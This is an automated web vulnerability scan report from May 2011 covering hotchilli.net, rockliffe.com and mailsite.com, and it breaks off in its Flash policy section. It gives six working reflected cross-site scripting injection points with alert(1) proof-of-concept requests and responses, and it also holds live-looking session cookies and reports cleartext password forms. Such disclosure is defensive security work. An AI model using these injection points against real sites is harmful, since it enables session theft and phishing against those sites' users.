XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB,

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 08:03:23 CDT 2011.

Loading


1. Cross-site scripting (reflected)

1.1. http://support.hotchilli.net/ [name of an arbitrarily supplied request parameter]

1.2. https://totalcontrol.hotchilli.net/index.cfm [Submit parameter]

1.3. https://totalcontrol.hotchilli.net/index.cfm [j_password parameter]

1.4. https://totalcontrol.hotchilli.net/index.cfm [j_username parameter]

1.5. http://webchat.rockliffe.com:9090/webchat/live [action parameter]

1.6. http://www.mailsite.com/common/reporterror.asp [webpage parameter]

2. Cleartext submission of password

2.1. http://rockliffe.com/portal/

2.2. http://webmail.hotchilli.co.uk/

2.3. http://webmail.hotchilli.co.uk/default.asp

3. SSL cookie without secure flag set

4. Session token in URL

5. Flash cross-domain policy

5.1. http://feeds.bbci.co.uk/crossdomain.xml

5.2. http://newsrss.bbc.co.uk/crossdomain.xml

6. Cookie without HttpOnly flag set

6.1. http://rockliffe.com/

6.2. http://support.hotchilli.net/

6.3. https://totalcontrol.hotchilli.net/index.cfm

6.4. http://webchat.rockliffe.com:9090/favicon.ico

6.5. http://webmail.hotchilli.co.uk/

6.6. http://www.mailsite.com/common/reporterror.asp

7. Password field with autocomplete enabled

7.1. http://rockliffe.com/portal/

7.2. http://support.hotchilli.net/

7.3. https://totalcontrol.hotchilli.net/index.cfm

7.4. https://totalcontrol.hotchilli.net/index.cfm

8. Cookie scoped to parent domain

8.1. http://id.google.com/verify/EAAAAAR87q5D244RWAHBaYA4v_w.gif

8.2. http://id.google.com/verify/EAAAAD1pAuvB2zCFOdDDBxDXkiw.gif

9. Cross-domain Referer leakage

10. Cross-domain script include

10.1. http://rockliffe.com/

10.2. http://rockliffe.com/portal/

10.3. http://www.mailsite.com/

11. TRACE method is enabled

11.1. http://hotchilli.net/

11.2. http://support.hotchilli.net/

11.3. https://totalcontrol.hotchilli.net/

12. Email addresses disclosed

12.1. http://hotchilli.net/

12.2. http://hotchilli.net/communications/ngn.htm

12.3. http://hotchilli.net/communications/premium-rate.htm

12.4. http://hotchilli.net/support/total-control.htm

12.5. http://rockliffe.com/

12.6. http://rockliffe.com/nav_functions.js

12.7. http://rockliffe.com/portal/

12.8. http://support.hotchilli.net/

12.9. https://totalcontrol.hotchilli.net/index.cfm

12.10. http://www.google.com/s

12.11. http://www.google.com/search

12.12. http://www.mailsite.com/

12.13. http://www.mailsite.com/nav_functions.js

13. Private IP addresses disclosed

14. Robots.txt file

14.1. http://feeds.bbci.co.uk/news/rss.xml

14.2. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

14.3. http://rockliffe.com/

14.4. http://www.google-analytics.com/__utm.gif

14.5. http://www.mailsite.com/common/reporterror.asp

15. Cacheable HTTPS response

15.1. https://totalcontrol.hotchilli.net/CFIDE/scripts/cfform.js

15.2. https://totalcontrol.hotchilli.net/CFIDE/scripts/masks.js

16. HTML does not specify charset

16.1. http://rockliffe.com/

16.2. http://rockliffe.com/portal/

16.3. http://webchat.rockliffe.com:9090/

16.4. http://webmail.hotchilli.co.uk/stylecfg.asp

16.5. http://www.mailsite.com/

16.6. http://www.mailsite.com/common/reporterror.asp

16.7. http://www.mailsite.com/favicon.ico

17. Content type incorrectly stated

17.1. http://rockliffe.com/quicklinks.js

17.2. http://webchat.rockliffe.com:9090/webchat/common.js

17.3. http://webchat.rockliffe.com:9090/webchat/live

17.4. http://webmail.hotchilli.co.uk/stylecfg.asp

17.5. http://www.google.com/mbd

17.6. http://www.google.com/realtimejs

17.7. http://www.google.com/realtimepts

17.8. http://www.google.com/search

17.9. http://www.mailsite.com/quicklinks.js

18. SSL certificate



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://support.hotchilli.net/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.hotchilli.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 220bf"><script>alert(1)</script>5b133a8cef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?220bf"><script>alert(1)</script>5b133a8cef0=1 HTTP/1.1
Host: support.hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/support/total-control.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:02 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833878;expires=Tue, 07-May-2041 12:05:02 GMT;path=/
Set-Cookie: CFTOKEN=54852333;expires=Tue, 07-May-2041 12:05:02 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6511

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm?220bf"><script>alert(1)</script>5b133a8cef0=1" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
...[SNIP]...

1.2. https://totalcontrol.hotchilli.net/index.cfm [Submit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The value of the Submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eeb9"><script>alert(1)</script>c3ba083b349c590d was submitted in the Submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /index.cfm?Submit=Forgot+Your+Password%3F8eeb9"><script>alert(1)</script>c3ba083b349c590d&j_username=1&j_password=1&j_username=l&j_password=%3B&Submit=Log+In+---%3E HTTP/1.1
Host: totalcontrol.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=1
Cookie: CFID=3834080; CFTOKEN=38063382

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:13:10 GMT
Server: Apache/2.0.61 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F8eeb9"><script>alert(1)</script>c3ba083b349c590d&j_username=1&j_password=1&j_username=l&j_password=%3B&Submit=Log+In+---%3E" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
...[SNIP]...

1.3. https://totalcontrol.hotchilli.net/index.cfm [j_password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The value of the j_password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8595c"><script>alert(1)</script>3aa390199e8f7850d was submitted in the j_password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=18595c"><script>alert(1)</script>3aa390199e8f7850d&j_username=l&j_password=%3B&Submit=Log+In+---%3E HTTP/1.1
Host: totalcontrol.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=1
Cookie: CFID=3834080; CFTOKEN=38063382

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:13:34 GMT
Server: Apache/2.0.61 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=18595c"><script>alert(1)</script>3aa390199e8f7850d&j_username=l&j_password=%3B&Submit=Log+In+---%3E" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
...[SNIP]...

1.4. https://totalcontrol.hotchilli.net/index.cfm [j_username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c835"><script>alert(1)</script>624f8f39d15bf5c70 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /index.cfm?Submit=Forgot+Your+Password%3F&j_username=17c835"><script>alert(1)</script>624f8f39d15bf5c70&j_password=1&j_username=l&j_password=%3B&Submit=Log+In+---%3E HTTP/1.1
Host: totalcontrol.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F&j_username=1&j_password=1
Cookie: CFID=3834080; CFTOKEN=38063382

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:13:19 GMT
Server: Apache/2.0.61 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<form name="CFForm_1" id="CFForm_1" action="https://totalcontrol.hotchilli.net/index.cfm?Submit=Forgot+Your+Password%3F&j_username=17c835"><script>alert(1)</script>624f8f39d15bf5c70&j_password=1&j_username=l&j_password=%3B&Submit=Log+In+---%3E" method="POST" onsubmit="return _CF_checkCFForm_1(this)">
...[SNIP]...

1.5. http://webchat.rockliffe.com:9090/webchat/live [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webchat.rockliffe.com:9090
Path:   /webchat/live

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload e1465<script>alert(1)</script>649398e6a89 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webchat/live?action=isAvailablee1465<script>alert(1)</script>649398e6a89&workgroup=mailsite@workgroup.rockliffe.com HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 217

<b>Fastpath Servlet</b><hr><br>Content Type: null<br>Content Encoding: UTF-8<p><b>Parameters:</b><ul><li>workgroup=mailsite@workgroup.rockliffe.com<li>action=isAvailablee1465<script>alert(1)</script>649398e6a89</ul>
...[SNIP]...

1.6. http://www.mailsite.com/common/reporterror.asp [webpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The value of the webpage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 289e3"><script>alert(1)</script>475b22e7a6f was submitted in the webpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/reporterror.asp?webpage=UserRoomAccessIssue289e3"><script>alert(1)</script>475b22e7a6f HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/portal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=KCGBGCODGALBPLPMJGMBPECC; path=/
Vary: Accept-Encoding
Content-Length: 1787


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...
<INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssue289e3"><script>alert(1)</script>475b22e7a6f">
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://rockliffe.com/portal/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /portal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /portal/ HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG; __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmb=179611303; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

2.2. http://webmail.hotchilli.co.uk/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.hotchilli.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: webmail.hotchilli.co.uk
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/support/total-control.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:47:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3679
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSESSIONIDCCBQACBB=PCBANHLDAPJHDHIDIHOHLLJK; path=/
Cache-control: private

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- expresscfg.asp ver. 5.3.11 -->

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- localcfg.asp ver. 5.3.11 -->

<!-- Copyright 1
...[SNIP]...
<body bgcolor="white" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="javascript:SetUTCOffset();document.forms[0].username.focus();">

<form name="ExpressLogin" action="initialize.asp" method="post" target="Express" autocomplete="off" onSubmit="OpenExpress(document.ExpressLogin)">
<input type="hidden" name="UTCOffset" value="">
...[SNIP]...
<td><input type="password" size="30" name="password" autocomplete="off" value=""></td>
...[SNIP]...

2.3. http://webmail.hotchilli.co.uk/default.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.hotchilli.co.uk
Path:   /default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /default.asp HTTP/1.1
Host: webmail.hotchilli.co.uk
Proxy-Connection: keep-alive
Referer: http://webmail.hotchilli.co.uk/loginerror.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBQACBB=OCBANHLDDLCELCHIFEOCPNOD

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:57:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3679
Content-Type: text/html; Charset=utf-8
Cache-control: private

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- expresscfg.asp ver. 5.3.11 -->

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- localcfg.asp ver. 5.3.11 -->

<!-- Copyright 1
...[SNIP]...
<body bgcolor="white" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="javascript:SetUTCOffset();document.forms[0].username.focus();">

<form name="ExpressLogin" action="initialize.asp" method="post" target="Express" autocomplete="off" onSubmit="OpenExpress(document.ExpressLogin)">
<input type="hidden" name="UTCOffset" value="">
...[SNIP]...
<td><input type="password" size="30" name="password" autocomplete="off" value=""></td>
...[SNIP]...

3. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

POST /index.cfm HTTP/1.1
Host: totalcontrol.hotchilli.net
Connection: keep-alive
Referer: http://support.hotchilli.net/
Cache-Control: max-age=0
Origin: http://support.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 56

Submit=Forgot+Your+Password%3F&j_username=1&j_password=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:16 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833928;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Set-Cookie: CFTOKEN=12505786;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...

4. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.google.com
Path:   /realtimejs

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /realtimejs?q=ColdFusion.required&hl=en&sa=X&tbs=rltm:1&prmd=ivns&ei=0MzPTYahNKT40gHl_JHvDQ&polltype=mb&since=1305463416000000&sessionstart=1305463416000000&usg=6fb3 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 15 May 2011 12:53:40 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 290

mbrt0.insert('{\x22nextRequest\x22:\x22/realtimejs?q\\x3dColdFusion.required\\x26hl\\x3den\\x26sa\\x3dX\\x26output\\x3dsearch\\x26tbs\\x3drltm:1\\x26prmd\\x3divns\\x26ei\\x3d0MzPTYahNKT40gHl_JHvDQ\\x2
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=117
Expires: Sun, 15 May 2011 12:50:25 GMT
Date: Sun, 15 May 2011 12:48:28 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
